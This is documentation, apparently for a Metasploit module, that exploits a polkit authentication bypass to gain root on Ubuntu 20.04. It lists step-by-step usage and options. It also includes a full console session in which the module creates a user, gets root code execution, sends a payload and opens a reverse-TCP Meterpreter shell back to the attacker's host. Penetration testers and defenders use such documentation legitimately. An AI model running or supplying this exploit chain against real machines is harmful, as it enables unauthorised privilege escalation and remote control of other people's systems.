Grant Willcox
4.2 KiB
Description
This module exploits a authentication bypass in Linux machines that make use of the polkit system service. The vulnerability enables an unprivileged local user to get a root shell on the system.
This exploit needs be run from an SSH or non-graphical session. The dbus-send command which is used to trigger the exploit,
launches an authentication agent. When run from a graphical session, an authentication agent pops up in the form of a
dialog box and waits for user input. This dialog box will cause the dbus-command to time out waiting for user input and
will prevent successful exploitation of polkit
If systemd is installed on the system the session service type can be checked by running: loginctl session-status.
The following output (x11) indicates a graphical session is being run and the exploit will not work:
Service: gdm-password; type x11; class user
The following output (tty) indicates a non-graphic session is being used and the exploit is likely to be successful:
Service: sshd; type tty; class user
Vulnerable Application
This module has been tested successfully on:
- Ubuntu 20.04
Installation And Setup
Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu.com/download/desktop
Verification Steps
- Start msfconsole.
- Get a session.
- Do:
use exploit/linux/local/polkit_dbus_auth_bypass. - Set the
SESSIONto the session obtained in step 2. - Set the
LHOST,LPORTandPAYLOADoptions as appropriate. - Do:
run. - It is possible for the exploit to fail. If this happens, increase the value of the ITERATIONS option to attempt the exploit more times before failing and attempt the exploit again.
- Enjoy the shell.
Options
SESSION The session to run this module on.
USERNAME The name of the user the exploit will add to the system
PASSWORD The password for the user to be created
WritableDir
Directory to write file to (%TEMP% by default).
Scenarios
Tested on Ubuntu 20.04
msf6 > use multi/handler
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.146:49882) at 2021-06-25 17:54:45 -0400
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use polkit_dbus
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/polkit_dbus_auth_bypass 2021-06-03 excellent Yes Polkit Authentication Bypass
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/polkit_dbus_auth_bypass
[*] Using exploit/linux/local/polkit_dbus_auth_bypass
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lport 4443
lport => 4443
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set session 1
session => 1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
[*] Started reverse TCP handler on 192.168.123.1:4443
[*] Executing automatic check (disable AutoCheck to override)
[*] Checking for exploitability via attempt
[+] The target is vulnerable. The polkit framework instance is vulnerable.
[*] Attempting to create user msf
[+] User msf created with UID 1019
[*] Attempting to set the password of the newly create user, msf, to: NpJsQSti
[+] Obtained code execution as root!
[*] Writing '/tmp/vOWnn' (207 bytes) ...
[*] Sending stage (984904 bytes) to 192.168.123.146
[+] Deleted /tmp/vOWnn
[*] Meterpreter session 2 opened (192.168.123.1:4443 -> 192.168.123.146:42066) at 2021-06-25 17:55:27 -0400
[*] Attempting to remove the user added:
[+] Successfully removed msf
meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 192.168.123.146
OS : Ubuntu 20.04 (Linux 5.8.0-55-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux